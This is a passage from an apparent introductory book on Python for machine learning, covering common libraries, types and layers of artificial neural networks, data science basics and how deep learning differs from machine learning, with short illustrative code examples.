Seaborn library can also be used to inspect the performance of other
variable inputs within the company; for example, the number of workers in
the company can easily be plotted with their corresponding working rates.
NumPy
This is a very widely used Python library, also known as Numerical Python. Its features enable it to process multidimensional arrays and matrices, backed by an extensive collection of mathematical functions. This makes it highly useful for the heaviest computations in the scientific sector. NumPy is also applied in areas such as linear algebra, random number generation, and Fourier transforms. Other high-end Python libraries, such as TensorFlow, use NumPy-style arrays for tensor manipulation. In short, NumPy is mainly for calculation and data storage, and it also provides the features needed to load data into Python and export it again.
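A small sketch of the array and matrix processing described above (the values are arbitrary examples):

```python
import numpy as np

# A 2x3 matrix and some element-wise math
a = np.array([[1.0, 2.0, 3.0],
              [4.0, 5.0, 6.0]])

col_means = a.mean(axis=0)   # mean of each column
doubled = a * 2              # element-wise multiplication

# Matrix product: (2x3) @ (3x2) -> (2x2)
b = a @ a.T

print(col_means)  # [2.5 3.5 4.5]
```

The same array object also supports saving and loading, e.g. with `np.save` and `np.load`, which is the data import/export ability mentioned above.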
SciPy
This is among the most popular scientific libraries in use today. It comprises different modules for optimization, integration, linear algebra, and other forms of mathematical statistics, all of which are valuable in data analysis.
In many cases, it plays a vital role in image manipulation, a process that is widely used in day-to-day activities; Photoshop-style edits are a familiar example of the kind of processing SciPy can perform. Many organizations prefer SciPy for manipulating images, especially pictures used in presentations. For instance, a wildlife society could take a photograph of a cat and then tint it with different colors to suit their project. Below is an example that can help you understand this more easily; the picture has been manipulated:

The original input image was a cat that the wildlife society took. After
manipulation and resizing the image according to our preferences, we get a
tinted image of a cat.
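As a small sketch of this kind of manipulation, using a synthetic gradient image in place of a real photograph (the zoom factor, blur width, and tint are illustrative choices), SciPy's `ndimage` module can resize and filter an array of pixels:

```python
import numpy as np
from scipy import ndimage

# Synthetic grayscale "photo": a 100x100 gradient
image = np.linspace(0, 255, 100 * 100).reshape(100, 100)

# Resize to half scale, then blur slightly
small = ndimage.zoom(image, 0.5)
blurred = ndimage.gaussian_filter(small, sigma=2)

# "Tint" by stacking the grayscale data into RGB channels
# and boosting the red channel (a hypothetical color effect)
tinted = np.stack([blurred * 1.2, blurred, blurred], axis=-1)

print(small.shape)    # (50, 50)
print(tinted.shape)   # (50, 50, 3)
```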
Keras
This is also an important part of the Python ecosystem, especially within machine learning. Keras is a high-level neural network API. It is significant to note that Keras can run on top of other libraries, notably TensorFlow and Theano, and that it works well on both the GPU and the CPU. For most beginners in Python programming, Keras offers an approachable path to understanding: they will be in a position to design a network and build it with little code. Its ability to prototype quickly makes it one of the best Python libraries among learners.
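As a minimal sketch, assuming TensorFlow's bundled Keras is installed, a tiny classifier might be assembled like this (the layer sizes and activations here are arbitrary choices for illustration, not prescribed by the text):

```python
from tensorflow import keras
from tensorflow.keras import layers

# A small feedforward network: 4 inputs -> 8 hidden units -> 3 classes
model = keras.Sequential([
    keras.Input(shape=(4,)),
    layers.Dense(8, activation="relu"),
    layers.Dense(3, activation="softmax"),
])

# Compile with a standard optimizer and loss for multi-class problems
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy")

print(model.count_params())  # (4*8 + 8) + (8*3 + 3) = 67
```

The few lines above are what makes Keras attractive to beginners: the network's design is readable almost like a diagram of its layers.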
PyTorch
This is another accessible, open-source Python library. It offers an extensive choice of tools and is widely applied in computer vision, where visual display plays an essential role in several types of research. It also aids in natural language processing. More so, PyTorch can undertake the technical tasks developers need: enormous calculations and computational data analysis. It builds the computational graphs used for these calculations, and since its core data structure is the tensor, its operations can be accelerated on a GPU.
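A hedged sketch of the tensor computation described, assuming PyTorch is installed (the values and the single matrix product are made-up examples):

```python
import torch

# Two tensors and a matrix product, with gradients tracked for x
x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], requires_grad=True)
w = torch.tensor([[0.5], [0.5]])

y = x @ w          # (2x2) @ (2x1) -> (2x1)
loss = y.sum()
loss.backward()    # autograd fills x.grad from the computational graph

print(y.flatten().tolist())  # [1.5, 3.5]
```

Moving these tensors to a GPU (via `.to("cuda")` on machines that have one) is what gives PyTorch its acceleration.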
Scrapy
Scrapy is another library, used for creating crawling programs such as spider bots. Spider bots help with data retrieval and with following the URLs that make up the web. From the beginning, Scrapy was meant to assist with data scraping. However, it has undergone several evolutions that expanded its purpose, so the main task of the Scrapy library in our present day is to act as a general-purpose crawler, promoting reusable, universal code.
Statsmodels
Statsmodels is a library aimed at data exploration through statistical computation and statistical tests. It has many features, such as result statistics for each estimator. It supports various models, including linear regression, multiple estimators, time series analysis, and other linear models; discrete choice models are available as well.
Benefits of Applying Python in Machine Learning
Programming
For machine learning algorithms, we need a programming language that is clear and easily understood by a large portion of data researchers and scientists. A language with libraries useful for different types of work, and for matrix math in particular, is preferable. Moreover, it is a great advantage to use a language with a large number of active developers. These features make Python the best choice. The main advantages of Python can be summarized in the following points:

1. Its syntax is clear.
2. It makes texts easy to manipulate.
3. It is used by a high number of people and communities.
4. It allows programming in different styles: object-oriented,
procedural, functional, etc.
5. Ideal for processing non-numeric data.
6. Ability to extract data from HTML.
7. Common in the scientific and also the financial communities.
Therefore, there is a seamless connection between the two
fields, especially in machine learning, as the financial field is
one of the main sources of the datasets.
8. Contains useful libraries such as SciPy and NumPy which
enables us to perform operations on vectors and matrices.
Chapter 10 Artificial Neural Networks
Over time, the human brain adapted and developed as part of the evolution
process. It became better after it modified many characteristics that were
suitable and useful. Some of the qualities that enhanced the brain include
learning ability, fault tolerance, adaptation, massive parallelism, low energy
utilization, distributed representation and computation, generalization ability,
and innate contextual processing of information.
The aim of developing artificial neural networks is the hope that the systems
will have some of these features in their possession. Human beings are
excellent at solving complicated perceptual issues such as identifying a
person in a crowded area from just a glimpse almost instantaneously.
On the other hand, computer systems calculate numerically and manipulate
the related symbols at super-speed rates. This difference shows how the
biological and artificial information processing varies, and a person can study
both systems to learn how to improve artificial neural networks best.
These networks seek to apply some organizational elements that the human
brain uses, such as learning ability and generalization skills, among others.
Thus, it is also essential for a person to have some understanding of
neurophysiology and cognitive science. It will help them to comprehend
artificial neural networks that seek to mirror how the brain works to function
effectively.
Here, we have the information regarding the types, layers, as well as the
advantages and disadvantages of artificial neural networks. Read on to find
out how artificial neural systems function in the machine learning process.
Introduction to Artificial Neural Networks
Artificial neural networks are one of the vital tools that a person uses in
machine learning. They refer to the materially cellular systems or
computational algorithms that can obtain, store, and use experimental
knowledge. These systems show the similarities that exist between the
functioning styles of artificial neural networks and the human information
processing system.
The biological neural networks inspire the design and development of
artificial neural systems. People use artificial neural networks to solve several
issues such as prediction, associative memory, optimization, recognition, and
control. As a result, the neural systems consist of a high number of linked
units of processing which operate together to process information and
produce significant results.
The human brain comprises millions of neurons that process and send cues
by using chemical and electrical signals. Synapses are specific structures that
connect neurons and permit messages to pass between them. The neural
networks form a significant number of simulated neurons. Similarly, artificial
neural systems have a series of interlinked neurons that compute values from
inputs.
They use a vast number of linked processing units, which act as neurons, to
accomplish information processing. The numerous groups of units form the
neural networks in the computational algorithm. These networks comprise
input and output layers, along with hidden layers, which can change the input
into that which an output layer can utilize.
Artificial neural networks are perfect instruments for identifying patterns that
are too complex for a person to retrieve and teach the computer to recognize.
It can also classify a significant amount of data after a programmer carefully
trains it. In this case, deep learning neural networks provide classification.
Afterward, the programmer uses backpropagation to rectify mistakes that
took place in the classification process.
Backpropagation is a method that an individual uses to calculate the gradient
failure or loss function. Deep learning networks provide multilayer systems
that identify and extract certain relevant elements from the inputs and
combine them to produce the final significant output. It uses complex
detection of features to recognize and classify data as needed by the user. The
programmers who train the networks label the outputs before conducting
backpropagation.
Therefore, artificial neural networks are the computational models that use
the biological central nervous system as a blueprint and inspiration.
Understanding neural networks enable a person to discover and comprehend
the similarities that exist. It also allows them to note the differences that exist
between the artificial and biological intelligence systems. They also know
how they can apply the suitable characteristics to improve and optimize
information and function.
Types of Artificial Neural Networks
Artificial Neural Networks are computational algorithms that draw
inspiration from the human brain to operate. Some types of networks employ
mathematical processes along with a group of parameters to establish output.
The different kinds of neural networks are:
Kohonen Self Organizing Neural Network
This type of system uses Kohonen's self-organizing map to visualize and classify data of high dimensions. The network forms a mapping from an arbitrary N-dimensional space onto the neurons (units), and the map maintains the topological connections of that space. The U-matrix method visualizes the structures in the N-dimensional space and identifies irregularities in the layout that this network provides.
A programmer trains the mapping that the network produces and enables it to form its own arrangement of the training data. During training, the input determines how the weights change while the neurons themselves stay in place. The first phase of the self-organizing process initializes each neuron with a small weight vector in the input space. In the second phase, the winning neuron is the one nearest to an input point, and the neurons linked to the winner also move toward that point. Euclidean distance measures the distance between the neurons and the point, with the minimum distance producing the winner. Repetition leads to clustering of the inputs, and every neuron comes to symbolize a type of cluster.
A person can apply Kohonen's self-organizing neural network to cluster data
because it can identify the limits between various subgroups of data. One
uses association to categorize new inputs. This neural system also enables a
user to acquire knowledge and analyze exploratory data. One uses it to
identify data and analyze cluster data into various classifications with
accuracy.
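The winner selection and weight update described above can be sketched in plain NumPy (the grid size of four neurons and the learning rate of 0.1 are illustrative choices):

```python
import numpy as np

rng = np.random.default_rng(42)

# 2D input space mapped onto a tiny map of 4 neurons
weights = rng.random((4, 2))      # one weight vector per neuron
point = np.array([0.5, 0.5])      # an incoming data point

# Winning neuron: minimum Euclidean distance to the point
distances = np.linalg.norm(weights - point, axis=1)
winner = int(np.argmin(distances))

# Move the winner toward the point (learning rate 0.1)
weights[winner] += 0.1 * (point - weights[winner])

# The winner is now strictly closer to the point than before
new_dist = np.linalg.norm(weights[winner] - point)
print(new_dist < distances[winner])  # True
```

Repeating this update over many input points, while also nudging the winner's grid neighbors, is what lets the map cluster the data as the text describes.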
Feedforward Neural Network – Artificial Neuron
This type is among the most accessible forms of neural networks because the
data moves in a single direction. The data goes through the input nodes and
comes out of the output ones. The feedforward type has no feedback connections, only forward propagation, and it may or may not have hidden layers. It also usually uses an activation function for classification purposes.
The system calculates the sum of the products of weights and inputs and feeds that sum to the output. The output produced is activated or deactivated, depending on a threshold value. This threshold is usually zero: if the sum is equal to or above it, the neuron discharges an activated output; if the sum is below it, the neuron does not fire, and the network sends out the deactivated value instead.
The Feedforward Neural Network copes well with noisy input, and it is easy to maintain. It appears in the speech and vision recognition features of a computer because it classifies complicated target classes.
Radial Basis Function Neural Network
This neural system looks at a point's distance from the center, and it consists of two layers. The features first pass through the radial basis functions in the inner layer. The system then takes the resulting outputs of those functions into account while processing the same values in the subsequent step, which acts as the memory. One can use the Euclidean method to measure the distances of interest.
This neural network classifies the points into various groups according to the
circle's radius or the highest reach. The closer the point is to the range of the
ring, the more likely the system will categorize that new point into that
particular class. The beta function controls the conversion that sometimes
takes place when there is a switch from one region to another.
The most prominent application of the Radial Function Neural Network is in
Power Restoration Systems, which are enormous and complex. The network
restores power quickly in an orderly manner where urgent clients like
hospitals receive power first, followed by the majority and lastly the common
few. The restoration goes following the arrangement of the power lines and
the customers within the radius of the tracks. The first line will resolve power
outage among the emergency clients, the second one will fix the power for
the majority, and the last one will deal with the remaining few.
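A Gaussian radial basis function of the kind described, with the point-to-center distance controlling class membership, can be sketched as follows (the two class centers and the beta value are illustrative):

```python
import numpy as np

def rbf(point, center, beta=1.0):
    """Gaussian RBF: near 1 at the center, falling off with squared distance."""
    dist = np.linalg.norm(point - center)
    return np.exp(-beta * dist ** 2)

# Two hypothetical class centers
centers = {"class_a": np.array([0.0, 0.0]),
           "class_b": np.array([5.0, 5.0])}

point = np.array([0.5, 0.2])
scores = {name: rbf(point, c) for name, c in centers.items()}

# The point is classified into the class whose center it is nearest
best = max(scores, key=scores.get)
print(best)  # class_a
```

The `beta` parameter plays the role the text gives it: it controls how sharply membership switches as a point moves from one region toward another.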

Recurrent Neural Network – Long Short Term Memory
The Recurrent neural network saves the output of a layer and feeds it back into the input, which helps in predicting the outcome of that layer. This type of neural network appears in models such as text-to-speech conversion. In such a model, the system first changes the text into phonemes, and a synthesis model then converts those into speech audio. The initial pass uses text as input and produces a phonological sound as output; the network then reuses the output phoneme as input, and the system produces the final outcome, which is the speech.
Neurons in Recurrent neural networks perform like memory cells while
carrying out computations. Each neuron remembers some details or data that
it possessed in the preceding time-step. Thus, the more the information passes
from one neuron to the next, the more knowledge a neuron recalls. The
system works using the front propagation and recollects which knowledge it
will require for future use.
In case the prediction that the network makes is wrong, a person utilizes
backpropagation. They correct errors and employ the learning rate to create
small modifications. These alterations will guide the system to make correct
predictions. It is essential also to note that the sum of the features and weights
produce the outputs, which create the first layer of the Recurrent Neural
Network type.
Convolutional Neural Network
This neural network type can receive an input image and attribute importance
to different features or items in the representation. Afterward, it can manage
to distinguish one figure from another. Convolutional neural networks require
less pre-processing in comparison to other algorithms used in classification.
The different methods need to utilize filters that a programmer engineers by
hand. In contrast, the deep learning algorithms of this neural network type
have the capability of learning the necessary filters or qualities.
The structure of the Convolutional neural network gets its inspiration from
the formation and structure of the Visual cortex in the brain. Its organization
is similar to the patterns of connection of neurons in the human brain. The
single neurons react to stimuli only in a confined region of the optical area
called the Receptive field. A group of this field covers the whole visual area
by overlapping.
The neural network type, therefore, uses relevant filters to fit the image data
collection better and consequently comprehend more the complexity of an
image. The screens refer to the system taking in the input features in batches
which help it to recall the image in sections and compute processes. The
system carries out appropriate screening and reduces the number of
frameworks concerned as well as enables the recycling of weights. As a
result, the Convolutional neural network type can obtain the Temporal and
Spatial dependencies effectively.
This neural system has biases and learn-able weights in their neurons that
enable a person to use it in the processing of signals and images in the
computer vision area. The computation process includes converting an image from an RGB or HSI scale to grayscale. This conversion changes the pixel values, which in turn assists in identifying the edges. It then enables the
classification of images into various categories. Techniques in computer
vision utilize this neural network significantly because it processes signals
and provides accurate image classification.

Modular Neural Network
This neural system type has a group of various networks that work
individually to supply to the output. They do not transmit signals to one
another while carrying out the necessary tasks. Every neural system contains
a collection of inputs that are exclusive to the related network. Thus, the
structures do not interact with each other in any way while they work to
create and perform the assigned sub-duties. They reduce the sophistication of a process by breaking it down into sub-tasks, and the networks can function without interacting with one another because the number of links between the processes lessens.
As a result, efficiency in the accomplishment of the sub-tasks leads to an
increased speed of the computation process. Nevertheless, the time it takes to
complete the process is contingent on the number of neurons and their
engagement in the computation of results.
Artificial Neural Network Layers
Three layers make up the Artificial Neural Networks. These layers are the
input, hidden, and output ones. Numerous interlinked nodes form each one of
these layers, and the nodes possess an activation function, which is an output
of a specific input.
Input Layer
This layer takes in the values of the descriptive qualities for every
observation. It offers the patterns to the system that communicate to the
hidden layers. The nodes in this layer do not modify the data because they are
passive. It duplicates every value that it receives and sends them onto the
hidden nodes. Additionally, the number of descriptive variables is the same
as the number of nodes present in this layer.

Hidden Layer
This layer utilizes a structure of weighted links to process values. It
multiplies the values getting into the stratum by weights and then adds the
weighted inputs to obtain a single number. The weighting, in this case, refers
to a group of preset numbers that the program stores. The hidden layer
implements particular conversions to the input values in the system.
Output Layer
This layer obtains links from the input layer or the hidden layer and provides
an output that matches the prediction of the feedback variable. The selection
of suitable weights leads to the layer producing relevant manipulation of data.
In this layer, the active nodes merge and modify the data to generate the
output value.
In conclusion, the input layer includes input neurons that convey information to the hidden layer, and the hidden layer then passes the data on to the output layer. Synapses in a neural network are the adjustable connections that turn a neural system into a parameterized network. Hence, every neuron in the neural network has weighted inputs, an activation function, and an output; the weights represent the synapses, while the activation function determines the output for a particular input.
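The three layers just described can be sketched as a single forward pass in NumPy (the layer sizes, random weights, and sigmoid activation are illustrative choices):

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

rng = np.random.default_rng(0)

# Input layer: 3 descriptive variables, passed on unchanged
x = np.array([0.2, 0.7, 0.1])

# Hidden layer: weighted links plus an activation function
w_hidden = rng.normal(size=(3, 4))   # 3 inputs -> 4 hidden nodes
hidden = sigmoid(x @ w_hidden)

# Output layer: combines the hidden values into one prediction
w_out = rng.normal(size=(4, 1))
output = sigmoid(hidden @ w_out)

print(output.shape)  # (1,)
```

Note how the input layer does no computation of its own, exactly as described: the weighted sums happen in the hidden and output layers.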
Advantages and Disadvantages of Neural Networks
There are some advantages and disadvantages to using Artificial Neural
Networks. Understanding them can enable one to comprehend better the
operations and shortcomings involved in the neural networks.
Advantages of Artificial Neural Networks
The following are the advantages of Artificial Neural Networks, which help a
person to learn the benefits of using the neural systems.
a) Ability to Learn – Artificial neural systems learn from circumstances and events, and decide by drawing on similar occurrences.
b) Ability to Work with Incomplete Knowledge – Proper training enables
the network to provide output even when the information is insufficient or
incomplete.
c) Having a Distributed Memory – A programmer uses examples to teach
the neural network and get it to produce desired outputs. They train the neural
system by the desired outcome by utilizing as many details as possible. The
example comprises of all the information and sections necessary to ensure
that the network will learn the most. This training provides the system with a
memory that has different relevant details that will allow for the production
of suitable outputs. The better the example in the training process is, the less
likely the neural network is to provide false outputs.
d) Parallel Processing Capability – The networks can carry out several
jobs at the same time due to their numerical advantage. They process several
numerics simultaneously and at a high speed.
e) Storing Information on the Entire Network – The system stores
information on the whole network and not in databases. It enables the system
to continue operating even in cases where a section loses some information
details.
f) Having Fault Tolerance – The network is fault-tolerant in that it can
carry on providing output even in situations where one or more cells decay.
g) Gradual Corruption – Degradation in the network does not take place abruptly and instantly. It occurs slowly and progressively over time, which allows one to keep using the system despite the corruption.

Disadvantages of Artificial Neural Networks
Below are a few difficulties associated with Artificial Neural Networks. They
indicate the downside of a person utilizing the system.
a) The difficulty of showing the Issue to the Network – This neural system
only deals with information in numerical form. The user must, therefore,
convert problems in numerical values to utilize the network. The user may
find it challenging to transform the display mechanism as needed.
b) Dependence on Hardware – The neural networks depend on hardware
with parallel processing ability, without which they cannot function.
c) The Duration of the Network is Unidentified – The system signals the completion of training when the error on the sample drops to a particular value, but reaching that value does not guarantee optimal results, and how long training will take cannot be known in advance.
d) Unexplained Behavior of the Network – There is decreased trust in the
network because it provides solutions for an inquisition without an
accompanying explanation.
e) Determining the Proper Network Structure – Relevant neural systems
form through experiments and experiences. There is no set rule for
establishing an appropriate network structure.
In conclusion, Artificial Neural Networks are a crucial tool in Artificial
Intelligence and machine learning. A person needs to understand what the
neural system means and how it functions. The types of networks indicate
how the network operates in different circumstances while the layers show
how data moves in this neural system. The advantages and disadvantages also
inform a user about the highs and lows of the networks. The information
above provides significant knowledge that a person can use to learn about
Artificial Neural Networks. Subsequently, they can employ it in their
application of the systems.
Chapter 11 Data Science

One of the main reasons that we have spent so much of our time taking a look
at machine learning and what we are able to do with it along with Python is
that we want to be able to use this to help us out with data science. Many
companies are diving into the idea of data science and all that this method is
able to do for them, and whether your business is looking to expand to a new
area or you would like to reach more customers or release a new product,
data science will be able to help you out.
Now, there are going to be a few different steps that come with data science
in order to make sure that it is as successful as possible. But overall, it is
going to consist of many machine learning and Python algorithms that will
help us to take our prepared data, and organize it in a way that we are able to
use later on. But there is definitely a lot more that we are able to do with the
help of data science, and we are going to spend a bit of time exploring that
now. In this chapter, we are going to look at a few important steps in this
process including the basics of what data science is all about, how deep
learning comes into play, and how data preparation can be the tool we need
as well.
What is Data Science?
The first topic that we are going to spend some time on here is data science itself. Data science, to keep things simple, is the detailed study of the flow of information through the large amounts of data that a company has gathered, in the hope of learning something from it. In our modern world, there is information no matter which way we turn. Companies can collect a lot of data from their customers, for example simply by setting up accounts on social media or using other methods, and then use this data in many different ways.
While gathering up all of this different information is important, and may
seem like the only thing a company needs to do, the problem is going to
really show up when we try to figure out the steps that we should take with
all of that data. It doesn’t do us a lot of good to just hold onto that
information without an idea of what we are able to do with it, or even any
ideas on what we will be able to find inside of that data. And because there is
a lot of data, usually more than we realize when we get started, it is hard for
us to simply assign a person, or even a team, to look through that data, and
efficiently and quickly find the patterns and insights that are in that set of
data.
Data science is here in order to handle this kind of problem. It is going to step
in to help us figure out what is found in the information, and even how to
store the information. And with the help of artificial intelligence and machine
learning, which we will talk about a bit later, we will find that data science
will be able to go through the information and find what trends are there,
especially the ones that are hidden.
When it comes to data science, we are going to be able to obtain some
meaningful insights from raw and unstructured data, which is then going to
be processed through skills that are business, programming, and analytical.
Let’s take a look at more about what this data science is all about, why it is
important, and some of the different parts of the data science cycle.
Right now, roughly 2.5 quintillion bytes of data are generated each day for companies to use, and the rate is growing even faster as the IoT continues to expand. This is an extraordinary amount of data, which companies can use to learn about their customers, figure out the best products to release next, and provide the best possible customer service. All of this data comes from a variety of sources, including:

1. Sensors are set up in shopping malls in order to gather up the
information of the individual shopper.
2. Posts on the various platforms of social media can send back
information to the company.
3. Videos that are found on our phones and digital pictures are
taking in more data than ever before.
4. Companies are able to even get some good information when
they look at some of the purchase transactions that come when
people shop online and through e-commerce.
Think about how much data this can end up producing for us. No matter
where the data comes from though, it is going to be known as big data. As we
can imagine here, from all of the different sources of data, companies are
going to be flooded and dealing with more data than they really know how to
handle. And it is impossible for an individual to go through and do this work
on their own. That is why it is going to be important for us to learn the best
methods to use in order to handle the data and make it work for our needs.
When this happens, we are better able to use that data and all of the
information inside to make some smarter business decisions to lead us on.
It is at this part where we see the idea of data science showing up more and
more in the picture. Data science is going to bring together a variety of skills
that are necessary for success in the world of business, including business
domain knowledge, statistics, and mathematics. All of these are going to be
important to our process because they are going to help an organization out in
many ways. It is likely that we are yet to know all of the ways that these are
going to help out a business in the future, but some of the ways that
companies are able to use this data right here and now will include:

1. Helping the company learn new ways where they can reduce
costs each day.
2. It can help the company figure out the best method to take to
get into a new market that will be profitable for them.
3. This can help the company learn about a variety of
demographics and how to tap into them.
4. It can help the company to take a look at the marketing
campaign that they sent out there and then figure out if the
marketing campaign was actually effective.
5. It can make it easier for the company to successfully launch a
new service product.
We have already spent some time taking a look at the lifecycle that comes
with data science, but to help us learn more about it, and to have a review,
let’s go over the steps. We will need to come up with the main business
problem that we would like to solve and then begin collecting the data that
we want to use. Since this data is going to be found in a lot of different
locations, we will be able to format it, clean it off, and make sure that the
outliers, duplicates, and missing values are taken care of.
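A hedged sketch of that cleaning step, using pandas on a made-up customer dataset (the column names and the median-fill strategy are illustrative choices):

```python
import pandas as pd

# Hypothetical raw customer data with a duplicate row and a missing value
raw = pd.DataFrame({
    "customer": ["ann", "bob", "bob", "cara"],
    "spend":    [120.0, 80.0, 80.0, None],
})

clean = (
    raw.drop_duplicates()   # remove the duplicate row
       # fill the missing value with the column median
       .assign(spend=lambda d: d["spend"].fillna(d["spend"].median()))
)

print(len(clean))                    # 3 rows after deduplication
print(int(clean["spend"].isna().sum()))  # 0 missing values remain
```

Outliers would be handled similarly, for example by filtering rows whose values fall outside a chosen range before modeling.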
From there, we are able to deal with the data through an algorithm. With the
help of the Python coding language and all of the features that it is able to
provide, we will see that there are a ton of algorithms that work well for this
process. We can choose the one that we need, and then do some training and
testing of the information ahead of time to make sure it is ready for making
predictions. We can then finish off the whole thing with some visualizations
that make it easier to see some of the complex relationships and correlations
that happen inside of our data.
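The train-and-test step described above can be sketched end to end. In this toy example (the data and the nearest-neighbour "model" are invented for illustration) we split a labeled data set, "train" by memorizing the training points, and measure accuracy on the held-out test data before trusting any predictions:

```python
import random

# Toy labeled data: (feature value, label).
data = [(1.0, "small"), (2.0, "small"), (8.0, "large"), (9.0, "large")]

# Split into training and testing sets.
random.seed(0)                      # fixed seed for a repeatable split
random.shuffle(data)
split = int(len(data) * 0.75)
train, test = data[:split], data[split:]

def predict(x):
    # Nearest neighbour: return the label of the closest training point.
    nearest = min(train, key=lambda pair: abs(pair[0] - x))
    return nearest[1]

# Evaluate on the held-out test data.
correct = sum(predict(x) == label for x, label in test)
accuracy = correct / len(test)
```

The same shape, split, fit, evaluate, carries over directly to the real algorithms in libraries such as scikit-learn.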
From there, we need to move on to some of the components that will show up
in our data science project. There are a lot of components that need to come
together and need to work together to ensure we are actually able to get the
most out of any data science project we are working with.
The first component that we need to spend some time on is to pay attention to
the types of data that we are working with. The raw data that we have is so
important because it is going to be the foundation for all of the other things
that we do through this process. The two main types of data you will
encounter are structured data, the kind found in tabular form or in a data
set, and unstructured data, which includes images, videos, emails, and PDF
files, to name a few.
The second component that we are going to find when we look at data
science is programming. You have to write some code in order to build those
mathematical models that we talked about earlier and to get them to sort
through the information and make predictions. All of the analysis and
management of the data is done through computer programming. The two most
popular languages used in data science are R and Python, so learning one of
these can be helpful.
Next on the list is probability and statistics. Data is manipulated so that
information and trends can be extracted from it, and probability and
statistics are the mathematical foundation that brings this all together.
Without a good working knowledge of these two topics, it is possible to
misinterpret the data and come up with conclusions that are not correct.
This is a big reason why probability and statistics are so important to the
world of data science.
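A one-line illustration of why this matters: without a feel for basic statistics, it is easy to report a misleading "average". In this made-up salary list, a single extreme value drags the mean far from anything typical, while the median stays representative:

```python
from statistics import mean, median

# Made-up salary data with one extreme value.
salaries = [40_000, 45_000, 50_000, 52_000, 1_000_000]

avg = mean(salaries)     # pulled far upward by the single outlier
mid = median(salaries)   # still describes a typical salary
```

Choosing the wrong summary statistic here would lead straight to an incorrect conclusion about what a "typical" salary is.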
We also have to take a look at the idea of machine learning when we are
looking at data science. When someone is working through all of that big
data and everything that is contained inside of it, they are also going to
use many of the algorithms that come with machine learning. This can include
methods of both classification and regression.
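To see the difference between the two: classification predicts a category, while regression predicts a number. Here is a minimal least-squares regression in plain Python, on invented points that roughly follow y = 2x + 1:

```python
# Made-up data that roughly follows y = 2x + 1.
xs = [1.0, 2.0, 3.0, 4.0]
ys = [3.1, 4.9, 7.2, 8.8]

# Ordinary least squares for a line y = slope * x + intercept.
n = len(xs)
mean_x = sum(xs) / n
mean_y = sum(ys) / n
slope = (sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
         / sum((x - mean_x) ** 2 for x in xs))
intercept = mean_y - slope * mean_x

def predict(x):
    # Regression output: a number, not a class label.
    return slope * x + intercept
```

The fitted line lands close to the true slope of 2 and intercept of 1, despite the noise in the points.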
And the final key component that we need to spend some time on here is the
idea of big data. In the world we live in today, raw data is so important, but
we need to be able to take it and turn it into something that we are actually
able to use. There is a lot of good information in all of that data, but if it is
just sitting there, and we are not able to get all of that information out of it
that we need, then it is going to be worthless to us.
This is where the Python algorithms are really going to come into play. You
will find that when we pick out the algorithms and use the right ones, we can
take all of this raw data, the data that may be a mess, unorganized, and hard
to work with, and can actually turn it into something that we are able to use
and appreciate overall.
There are a lot of different things that we can do when it comes to data
science, but there are also a lot of parts that go into it. We have to make
sure that we understand each part of the data science process.
Chapter 12 A Quick Look at Deep Learning
Artificial intelligence is a field of study that has come up in many
conversations for years. A few years ago, this was a futuristic concept that
was propagated in movies and comic books. Through years of development
and research, we are currently experiencing the best of artificial intelligence.
In fact, it is widely expected that AI will help us usher in the new frontier in
computing.
Artificial intelligence might share some similarities with machine learning
and deep learning, but they are not the same thing. Many people use these
terms interchangeably without considering the ramifications of their
assumptions. Deep learning and machine learning are knowledge branches of
artificial intelligence. While there are different definitions that have been
used in the past to explain artificial intelligence, the basic convention is that
this is a process where computer programs are built with the capacity to
operate and function like a normal human brain would.
The concept of AI is to train a computer to think the same way a human brain
thinks and functions. As far as the human brain is concerned, we are yet to
fully grasp its real potential. Experts believe that even the most brilliant
individuals in the world are unable to fully exhaust their brain capacity.
This, therefore, creates a conundrum, because if we are yet to fully
understand and test the limits of our brains, how can we then build computing
systems that can replicate the human brain? What happens if computers learn
how to interact and operate like humans to the point where they can fully use
their brainpower before we learn how to use ours?
Ideally, the power behind AI or the limits of its thinking capacity is yet to be
established. However, researchers and other experts in the field have made
great strides over the years. One of the closest examples of AI that espouses
these values is Sophia. Sophia is probably the most advanced AI model in the
world right now. Perhaps given our inability to fully push the limits of our
brains, we might never fully manage to push the limits of AI to a point where
they can completely replace humans.
Machine learning and deep learning are two branches of artificial intelligence
that have enjoyed significant research and growth over the years. The
attention towards these frameworks especially comes from the fact that many
of the leading tech companies in the world have seamlessly implemented
them in their products, and integrated them into human existence. You
interact with these models all the time on a daily basis.
Machine learning and deep learning do share a number of features, but they
are not the same, just as neither is the same as artificial intelligence
itself. As a beginner, it is important to learn the difference between these
fields so that you can find opportunities to further your skills in the
industry. In a world that is continually spiraling towards increased machine
dependency, there are many job openings in machine learning and deep
learning at the moment. There will be many more in the near future too, as
people rush to adapt and integrate these systems into their daily operations
and lives.
Deep Learning vs Machine Learning
Before we begin, it is important that you remind yourself of the basic
definitions or explanations of these two subjects. Machine learning is a
branch of artificial intelligence that uses algorithms to teach machines how to
learn. Further from the algorithms, the machine learning models need input
and output data from which they can learn through interaction with different
users.
When building such models, it is always advisable to ensure that you build a
scalable project that can take new data when applicable and use it to keep
training the model and boost its efficiency. An efficient machine learning
model should be able to self-modify without necessarily requiring your input,
and still provide the correct output. It learns from structured data available
and keeps updating itself.
Deep learning is a class of machine learning that uses the same kinds of
algorithms and functions used in machine learning. However, deep learning
arranges its computation in layers, with each layer interpreting data in a
different way. The network of algorithms used in deep learning is referred
to as an artificial neural network.
The name artificial neural network gives us a good picture of what happens
in deep learning frameworks. The goal is to mimic the way the human brain
functions by modeling its neural networks. Experts in deep learning have
studied and referenced research on the human brain over the years, which has
helped spearhead work in this field.
Problem Solving Approaches
Let’s consider an example to explain the difference between deep learning
and machine learning.
Say you have a database that contains photos of trucks and bicycles. How can
you use machine learning and deep learning to make sense of this data? At
first glance, what you will see is a group of trucks and bicycles. What if you
need to identify photos of bicycles separately from trucks using these two
frameworks?
To help your machine learning algorithm identify the photos of trucks and
bicycles based on the categories requested, you must first teach it what these
photos are about. How does the machine learning algorithm figure out the
difference? After all, they almost look alike.
The solution is in a structured data approach. First, you will label the photos
of bicycles and trucks in a manner that defines different features that are
unique to either of these items. This is sufficient data for your machine
learning algorithm to learn from. Based on the input labels, it will keep
learning and refine its understanding of the difference between trucks and
bicycles as it encounters more data. Beyond this simple illustration, it can
keep searching through millions of other data points it can access to tell
the difference between trucks and bicycles.
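A minimal sketch of this structured, labeled approach follows. The wheel-count feature and the numbers are invented for illustration; the point is that the "learning" is simply deriving a decision rule from the labels we supplied:

```python
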